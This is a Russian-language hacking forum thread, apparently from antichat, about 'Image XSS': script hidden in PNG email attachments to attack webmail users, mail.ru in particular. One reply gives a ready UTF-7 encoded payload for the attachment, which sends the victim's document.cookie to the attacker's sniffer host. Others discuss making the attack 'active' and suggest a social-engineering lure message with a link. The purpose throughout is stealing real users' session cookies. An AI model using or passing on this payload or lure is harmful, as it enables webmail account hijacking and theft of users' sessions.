После прочтения разного материала выяснил несколько фактов:
1) Image XSS работает на всех известных мне почтовых службах(работает на момент написания поста).
2)кукисы тырятся.
3)XSS все-таки пассивная. Ибо рендеринг страницы происходит таким образом, что при вставке картинки непосредственно в тело письма, браузер не обрабатывает вложеный в нее код=(
4)данная XSS лично у меня заработала только с png-форматом=(

код вшитый в png'шку стандартный:
<script></script>
мэйл.ру обрабатывает на ура=)

осталась пара непоняток:
если вставить код наподобие
<html><meta http-equiv="Content-Type" content="text/html" charset="UTF-7">+ADw-script+AD4-сам скрипт+ADw-/script+AD4-
то например знак + не обрабатывается браузером....
и самое главное, как все-таки раскрутить активный XSS методом Image XSS?

1. У тебя там русские буквы "сам скрипт", поэтому теги скрипта не определятся.
2. Контент неправильно задан.
3. Чтобы решить проблему с плюсом, используй явный метод конкатенации.
В картинку-аттач вставляй это

<html><meta http-equiv="Content-Type" content="text/html; charset=UTF-7">+ADw-script+AD4-img=new Image;img.src='http://твой_снифф?'.concat(document.cookie);+ADw-/script+AD4-

Обрати внимание на запись атрибута content.

4. Никакой кодировки UTF-7 (если мы говорим о мейл.ру) на данный момент не требуется. Отправляй аттач не с майл.ру.

Чтобы вытянуть из этого активную(ые), нужно взглянуть на проблему шире.

слова "сам скрипт" - означает, что вместо этого у иеня там стоит скрипт=)
то что на mail.ru не требуется кодировки UTF-7 - я написал в своем посте.
вот на счет взгляда шире, можно поподробнее? можно в личку можно в аську=)

вот на счет взгляда шире, можно поподробнее? можно в личку можно в аську=)

Отлично! А можно сразу сюда _http://win.mail.ru/cgi-bin/support ? :D :D :D

И на кой тебе активная в самой почте? Интересно - ищи сам. А вообще тебе более подошло бы юзать это

http://forum.antichat.ru/showpost.php?p=430554&postcount=11

"Вася/Маша я тебя убью/люблю! ссылка на дневник"

Но поторопись! :D :D :D Ибо,ибо...